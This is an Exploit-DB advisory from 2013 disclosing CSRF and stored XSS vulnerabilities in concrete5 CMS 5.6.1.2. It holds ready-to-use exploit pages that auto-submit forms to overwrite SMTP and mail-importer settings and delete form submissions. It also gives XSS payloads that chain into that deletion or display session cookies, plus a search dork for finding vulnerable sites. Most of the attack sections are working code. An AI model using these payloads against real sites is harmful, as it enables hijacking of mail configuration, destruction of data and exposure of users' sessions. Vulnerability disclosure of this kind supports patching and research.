Concrete5 CMS 5.6.1.2 - Multiple Vulnerabilities

EDB-ID:

26077

CVE:





Platform:

PHP

Date:

2013-06-10


=============================================================
        __   __          _    ___    _   __   ____         
        \ \ / /         | |  / _ \  (_) /_ | |___ \        
   ___   \ V /   _ __   | | | | | |  _   | |   __) |  _ __ 
  / _ \   > <   | '_ \  | | | | | | | |  | |  |__ <  | '__|
 |  __/  / . \  | |_) | | | | |_| | | |  | |  ___) | | |   
  \___| /_/ \_\ | .__/  |_|  \___/  |_|  |_| |____/  |_|   
                | |                                        
                |_|              blackpentesters.blogspot.com
=============================================================

###########################################################################################
# Exploit Title: [ concrete5 CMS v5.6.1.2 Multiple CSRF and Stored XSS Vulnerabilities]   #
# Date: [2013-6-9]							             	  #
# Exploit Author: [expl0i13r]						     	     	  #
# Vendor Homepage: [http://www.concrete5.org/] 				             	  #
# Software Link: [http://www.concrete5.org/download_file/-/view/51635/8497/]         	  #
# Version: [5.6.1.2]			                                             	  # 
# Goole Dork: [Built with concrete5 - an open source CMS]		             	  #
# Tested on: [Windows]						                     	  #
# Contact: expl0i13r@gmail.com						             	  #
###########################################################################################

Summary:
========
 1. CSRF (Modify SMTP Settings)
 2. CSRF (Modify Mail Importers Settings)
 3. CSRF (Delete Form Results)
 4. Stored XSS


1. CSRF (Modify SMTP Settings):
================================

concrete5 v5.6.1.2 suffers from multiple CSRF vulnerabilities one of which allow an attacker
to modify "SMTP Settings" and "Send Mail Method" available at below URL :

Affected URL:
--------------
http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/mail/method/


----------------------------------------------------------------------------------------
Note: Below code collects form details,send and update it, when Victim loads this page
----------------------------------------------------------------------------------------

<html>
<head>
<script type="text/javascript" language="javascript">
 function submitform()
 {
 	document.getElementById('myForm').submit();
 }
 </script>
</head>
<body>
<form name="myForm" method="post" action="http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/mail/method/save_settings/" class="form-horizontal" id="mail-settings-form" original-class="form-horizontal">

<input type="radio" name="MAIL_SEND_METHOD" id="MAIL_SEND_METHOD2" value="SMTP" class="ccm-input-radio" checked>
<input id="MAIL_SEND_METHOD_SMTP_SERVER" type="text" name="MAIL_SEND_METHOD_SMTP_SERVER" value="127.0.0.1" class="ccm-input-text">				
<input id="MAIL_SEND_METHOD_SMTP_USERNAME" type="text" name="MAIL_SEND_METHOD_SMTP_USERNAME" value="expl0i13r" class="ccm-input-text">				
<input id="MAIL_SEND_METHOD_SMTP_PASSWORD" type="text" name="MAIL_SEND_METHOD_SMTP_PASSWORD" value="expl0i13r" class="ccm-input-text">				
<select name="MAIL_SEND_METHOD_SMTP_ENCRYPTION" id="MAIL_SEND_METHOD_SMTP_ENCRYPTION" ccm-passed-value="SSL" class="ccm-input-select">
<option value="">None</option>
<option value="SSL" selected="selected">SSL</option>
<option value="TLS">TLS</option></select>	
<input id="MAIL_SEND_METHOD_SMTP_PORT" type="text" name="MAIL_SEND_METHOD_SMTP_PORT" value="" class="ccm-input-text">				

</form>
<script type="text/javascript" language="javascript">
document.myForm.submit()
</script>
</body>
</html>


2. CSRF (Modify Mail Importer Settings)
=========================================

Below code exploits CSRF vulnerability which allows attacker to Edit and update "Importer Settings" details.

Affected URL :
---------------

http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/mail/importers/edit_importer/1/

----------------------------------------------------------------------------------------
Note: Below code collects form details,send and update them, when Victim loads this page
----------------------------------------------------------------------------------------

<html>
<head>
<script type="text/javascript" language="javascript">

 function submitform()
 {
 	document.getElementById('myForm').submit();

 }

</script>
</head>

<body>

<form name = "myForm" method="post" id="mail-importer-form" class="form-horizontal" action="http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/mail/importers/save_importer/" original-class="form-horizontal">

<input type="hidden" name="miID" id="miID" value="1">		
<input id="miEmail" type="text" name="miEmail" value="exploiter">
<input id="miServer" type="text" name="miServer" value="127.0.0.1" class="ccm-input-text">			
<input id="miUsername" type="text" name="miUsername" value="" class="ccm-input-text">			
<input id="miPassword" type="text" name="miPassword" value="" class="ccm-input-text">			<input id="miPort" type="text" name="miPort" value="8080" class="ccm-input-text">					
			
<select name="miEncryption" id="miEncryption" ccm-passed-value="" class="ccm-input-select">
<option value="" selected="selected">None</option>
</select>

<select name="miIsEnabled" id="miIsEnabled" ccm-passed-value="1" class="ccm-input-select">
<option value="1"  selected="selected">Yes</option>
</select>				
	
<select name="miConnectionMethod" id="miConnectionMethod" ccm-passed-value="POP" class="ccm-input-select">
<option value="POP" selected="selected">POP</option>
</select>				

<script type="text/javascript" language="javascript">
 document.myForm.submit()
</script>

</body>
</html>


3. CSRF (Delete Form Results)
===============================

Each Submissions available at "REPORTS" > "Form Results" page has static "qsID" assigned, using which attacker can delete submissions.

Ex.
---
When we install this CMS, "Contact Us" form by default available at URL : http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/blog/hello-world/about/contact-us/

For above "Contact Form", qsID in my case is "1370626098", which can be found at url:

--------------------------------------------------------------------------------------
http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/ 
--------------------------------------------------------------------------------------

<a href="/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/?qsID=1370626098&action=deleteFormAnswers" class="btn small error delete-form-answers ccm-button-v2-left">Delete Submissions</a>
------------------------------------------------------------------------------------------------------

In order to exploit this CSRF, attacker must have "qsID" values, for which attacker needs to have at least Limited access to CMS.

Steps:
------

1. Attacker logs in to CMS
2. Navigates to "http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/"
3. Gets Static "qsID" value from source code 
4. Use "qsID" to create below CSRF exploit 

Code:
-------

<html>
<head>
<script>
function delete()
{

# Delete Submissins "Contact Us" page

window.open("http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/?qsID=1370626098&action=deleteFormAnswers")

}
</script>
</head>
<body onload="delete()">
</body>
</html>


4. Multiple Stored XSS 
=======================

concrete5 CMS also suffers from Stored XSS vulnerability, which can be used to "Delete Form Results"
everytime page is loaded. 

Stored XSS-1
============

URL:
----
http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/users/add_group/

Vulnerable Parameter:
----------------------
<input type="text" name="gName" class="span6" value="" id="acpro_inp2">


XSS-CSRF Payload:
------------------

"><script>window.open("http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/reports/forms/?qsID=1370626098&action=deleteFormAnswers");alert('Form Result Data Deleted - eXpl0i13r')</script>


Stored XSS-2:
=============

URL:
-----
http://127.0.0.1/concrete5.6.1.2/concrete5.6.1.2/index.php/dashboard/system/attributes/sets/

Vulnerable Parameter:
----------------------
<input id="asName" type="text" name="asName" value="" class="ccm-input-text">

Payload:
---------

"><script>alert('hacked by eXpl0i13r\n'+document.cookie)</script>


##################################
#           eXpl0i13r            #
# ------------------------------ #
#|blackpentesters.blogspot.com	|#
#|infotech-knowledge.blogspot.in|#
# ------------------------------ #
##################################